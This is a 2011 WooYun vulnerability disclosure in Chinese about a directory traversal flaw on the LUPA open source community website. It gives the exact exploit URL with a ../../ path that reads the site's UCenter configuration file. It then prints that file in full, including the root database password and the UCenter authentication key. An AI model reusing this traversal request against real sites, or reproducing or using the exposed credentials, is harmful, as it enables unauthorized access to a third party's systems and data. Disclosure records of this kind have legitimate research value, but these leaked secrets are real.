LUPA开源社区源码泄露 | wooyun-2011-02510

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2011-02510

漏洞标题：

LUPA开源社区源码泄露

漏洞详情

披露状态：

2011-07-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2011-07-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我很无聊

详细说明：

http://www.lupaworld.com/code.php?mod=list&itemid=&path=/test&file=../../config/config_ucenter.php

漏洞证明：

1.   <?php
2.  
3.  
4.   define('UC_CONNECT', 'mysql');
5.  
6.   #define('UC_DBHOST', '192.168.1.10');
7.   define('UC_DBHOST', 'localhost');
8.   define('UC_DBUSER', 'root');
9.   define('UC_DBPW', '84636882');
10.   define('UC_DBNAME', 'lupa_www71');
11.   define('UC_DBCHARSET', 'utf8');
12.   define('UC_DBTABLEPRE', '`lupa_www71`.pre_ucenter_');
13.   define('UC_DBCONNECT', 0);
14.  
15.   define('UC_CHARSET', 'utf-8');
16.   define('UC_KEY', '1fG4v2c0Bdc94aM1Q8xcM4uac4M5I354ven4x0ecqcC7gef3v5c6fd86x1fey5p7');
17.   define('UC_API', 'http://www.lupaworld.com/uc_server');
18.   define('UC_APPID', '1');
19.   define('UC_IP', '127.0.0.1');
20.   define('UC_PPP', 20);
21.

修复方案：

basename

版权声明：转载请注明来源 t00000by57@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：5 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞